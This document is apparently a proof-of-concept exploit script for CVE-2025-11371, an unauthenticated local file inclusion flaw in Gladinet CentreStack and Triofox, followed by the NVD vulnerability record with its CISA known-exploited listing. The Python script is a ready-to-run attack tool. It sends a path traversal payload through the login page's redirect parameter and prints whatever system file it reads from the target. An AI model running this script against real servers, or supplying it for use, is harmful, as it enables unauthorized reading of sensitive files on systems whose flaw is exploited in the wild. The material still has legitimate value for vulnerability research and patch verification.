CVE-2025-11371

# CVE-2025-11371 - Gladinet CentreStack/Triofox Unauthenticated LFI PoC # Exploits Local File Inclusion to read arbitrary system files # Affected: All versions <= 16.7.10368.56560 import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-centrestack.local" FILE_TO_READ = sys.argv[2] if len(sys.argv) > 2 else "..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" def exploit_lfi(target, file_path): """ Send unauthenticated request to exploit the LFI vulnerability in Gladinet CentreStack/Triofox default installation. """ # Construct the malicious URL with path traversal payload url = f"{target}/portal/loginpage.aspx?redirect={file_path}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", } try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and len(response.text) > 0: print(f"[+] LFI successful! Contents of {file_path}:") print("-" * 60) print(response.text) print("-" * 60) return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print(f"[*] Targeting: {TARGET}") print(f"[*] Attempting to read: {FILE_TO_READ}") exploit_lfi(TARGET, FILE_TO_READ)

{"cve": {"id": "CVE-2025-11371", "sourceIdentifier": "5dacb0b8-2277-4717-899c-254586fe4912", "published": "2025-10-09T17:15:58.507", "lastModified": "2025-11-05T14:32:00.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. \n\nThis issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "cisaExploitAdd": "2025-11-04", "cisaActionDue": "2025-11-25", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.10.10408.56683", "matchCriteriaId": "E558139A-6A80-4BAA-8786-15E5AFCA9C37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.7.10368.56560", "matchCriteriaId": "A8D9B616-FF33-4FF0-A97C-4C0B134E7B40"}]}]}], "references": [{"url": "https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw", "source": "5dacb0b8-2277-4717-899c-254586fe4912", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.centrestack.com/p/gce_latest_release.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Release Notes"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11371", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}